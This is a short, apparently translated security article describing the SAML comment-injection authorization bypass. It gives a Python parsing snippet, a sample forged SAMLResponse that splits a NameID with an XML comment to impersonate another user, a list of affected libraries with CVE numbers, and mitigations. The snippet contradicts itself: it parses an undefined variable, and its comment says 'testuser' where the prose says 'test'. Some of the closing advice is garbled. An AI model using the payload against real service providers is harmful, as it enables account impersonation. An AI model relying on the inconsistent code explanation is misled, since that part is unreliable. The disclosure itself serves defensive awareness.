SAML authorization bypass

A security vulnerability has been discovered in SAML (Security Assertion Markup Language), with which
can bypass authorization. Vulnerabilities are affected by solutions from various SSO providers and several libraries using SAML SSO (Single Sign-On).

The SAML (Security Assertion Markup Language) markup language is an open, XML-based standard for exchanging authentication and authorization data between parties to a process. Using the SAML protocol, users can access many of their cloud applications by specifying just one login and password. Single Sign-On (SSO) is a common technology that allows you to log in to a web application via a third party as a third-party web application.

It is in this implementation that an error occurs that allows an attacker to place a comment inside the username field, the only condition is the presence of a valid username.

The problem lies in the method of processing comments in the markup of XML-code. When placing the comment code in the user name field, the line is broken. When processing a user name, the preprocessor "cuts off" the value after the comment field and does not take it into account when checking:

import xml.etree.ElementTree as et doc = "<NameID>test<!-- comment -->user</NameID>" data = et.fromstring(payload) return data.text # returns 'testuser' 

The expected values ​​are "testuser", but after the "break" only the value "test" will return.

An example of the implementation of this attack by a user with access to the user@user.com.evil.com account can change SAML to replace NameID with user@user.com when processing SP:

 <SAMLResponse> <Issuer>https://idp.com/</Issuer> <Assertion ID="_id1234"> <Subject> <NameID>user@user.com<!---->.evil.com</NameID> </Subject> </Assertion> <Signature> <SignedInfo> <CanonicalizationMethod Algorithm="xml-c14n11"/> <Reference URI="#_id1234"/> </SignedInfo> <SignatureValue> some base64 data that represents the signature of the assertion </SignatureValue> </Signature> </SAMLResponse> 

The following solutions are subject to this attack:

• OneLogin - python-saml - CVE-2017-11427
• OneLogin - ruby-saml - CVE-2017-11428
• Clever - saml2-js - CVE-2017-11429
• OmniAuth-SAML - CVE-2017-11430
• Shibboleth - CVE-2018-0489
• Duo Network Gateway - CVE-2018-7340

It is worth noting that the attack does not work against accounts protected using two-factor authentication (which is enabled by ~ 10% of users according to Google statistics).

To prevent such attacks, you need to update the used libraries, disable the public registration of user accounts in important networks, or abandon the canonization algorithm, which does not miss comments.